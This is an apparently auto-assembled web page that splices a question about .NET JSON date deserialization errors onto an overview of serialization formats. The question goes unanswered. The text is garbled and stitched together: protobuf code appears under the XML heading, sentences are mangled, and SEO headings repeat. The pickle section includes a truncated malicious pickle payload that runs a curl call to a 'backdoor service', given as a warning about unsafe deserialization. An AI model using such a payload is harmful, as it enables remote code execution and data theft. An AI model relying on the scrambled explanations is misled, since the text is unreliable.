I am currently working on a project where I am sending a.Net type via ajax to a client application via ajax. I have no issues with the object being serialized and set to the client.I run into issues when I take the exactly same object and post it back to the server via a web method with the following error: /Date(000)/ is not a valid value for DateTime. Which is pretty annoying as that is how Microsoft gave it to me, but that's besides the point.Does anyone have a quick fix for this? I want a seamless way this can be accomplished without having to change the object right before returning it from the ajax call.

  1. Json Date Serialization Calculator

.ContextProcesses need to interact with each other and hence they need to speak in same language. The serialization is the process of translating data structures and code objects into data stream in a format that can be stored or transmitted and deserialize back to origin data structure and code objects. Uses. Store data from memory into databases or disk. Transmit data to other processes or services. Remove procedure calls.SolutionsA list of serialization technology can be found in. Below covers the most widely used serialization format in industry.

XMLXML stands for eXtensible Markup Language. It's designed to store and transport data and human readable. Below is an example serialized data. import bookpb2 book = bookpb2.Book ( ) book. Id = '875' book.title = 'Structure and Interpretation of Computer Programs - 2nd Edition' book.SerializeToString ( ). Advantages:. Very efficient and impact data.

Has tested at scale in industry-level environments. Disadvantages:. Complicated. Need define proto and generate library first. It requires the tool generating library as well. In addition, the generated library needs to exist in both client and server side.

Json date serialization definition

This would generally cause problem when schema modified. Hard to debug.ThriftThrift is similar to ProtoBuf in all likelihood. It shares exact the same processes and concepts like ProtoBuf. Language Built-in SerializationMost languages have their own serialization solutions. There is rare example that data serialized by different languages can be used in other languages.

This is mainly because data objects are represented very different in memory.For example, in Python, you can use pickle and cPickle. class Foo:. Attr = 'A class attribute'. import pickle picklestring = pickle.dumps (Foo ) picklestringb'x80x03cmainnFoonqx00.' pickle.loads (picklestring ) Similar classes or interfaces can be found in other languages, for example, Marshal for Ruby, function serialize for PHP, class implemented java.io.Serializable for Java, etc.The deserialization is usually dangerous when in language specific format. Deserialization usually means code execution, and therefore, malformed data from untrusted source can harm the system that runs the program. It's the worst choice and generally not recommend to use.

Below is an example that a pickled data can send server ip to a backdoor service. Data = 'cossystem(S'curl.loads (data ). Advantage. Can support various data types. Disadvantage.

DANGEROUS!. Can't be used in other languages. Hard to debug.OthersINI, TOML and YAML are also human readable serialization formats.

INITOMLYAMLsectionsectionsection:key=valuekey='value'key: valueThe three serialization formats listed above are often used as configuration file format. Advantages. Human readable and writable. Well-support libraries.

Json date serialization javascript

Disadvantages. Not designed for large dataset.CSV is also a popular serialization format. It's in plain text format and pretty good for tabular data.

Below is an example one row csv file with a header as first line. import csv with open('/tmp/demo.csv', 'w') as f. Writer = csv.writer(f). Writer.writerow('ISBN', 'Title'). Writer.writerow('875', 'Structure and Interpretation of Computer Programs - 2nd Edition'). Advantage.

Human readable and writable. Good for streaming parsing and large dataset. Good for data with same schema.


Non-technical folks can open it in Excel or Google Spreadsheet. Disadvantage.

Type is limited. Usually values are considered as string only. No good support for binary data. Data structure is limited. It only fits tabular data.Conclusion. JSON is usually your first choice. It's simple, human readable, and has most widespread support.

Json Date Serialization Calculator

Use MsgPack instead of JSON if performance is an issue. Use Protobuf if type check and schema check is essential.

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